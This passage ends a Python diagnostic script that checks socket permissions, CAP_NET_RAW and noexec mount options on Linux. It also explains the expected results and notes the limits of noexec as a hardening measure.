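        if (path == mnt or path.startswith(mnt.rstrip("/") + "/")) and len(mnt) > len(best):
            best, opts = mnt, options
    return opts


def home_is_noexec(path: str = os.path.expanduser("~")) -> bool | None:
    try:
        with open("/proc/mounts") as f:
            return "noexec" in mount_options_for(path, f.read())
    except OSError:
        return None


if __name__ == "__main__":
    print("tcp socket   :", tcp_socket_permitted())
    print("raw socket   :", raw_socket_permitted(), "(CAP_NET_RAW:", has_cap_net_raw(), ")")
    print("home noexec  :", home_is_noexec())
    print("sample /home :", mount_options_for("/home/jurily/stuff", MOUNTS_SAMPLE))
```

On a stock desktop logged in as a normal user the raw socket is refused and CAP_NET_RAW is absent; run it under sudo and both flip. The mount check on the constructed table shows /home/jurily/stuff inheriting noexec from /home while /usr/bin does not; note that noexec on the home directory stops `./script.sh` but not `sh script.sh`, so it raises the bar rather than closing the door.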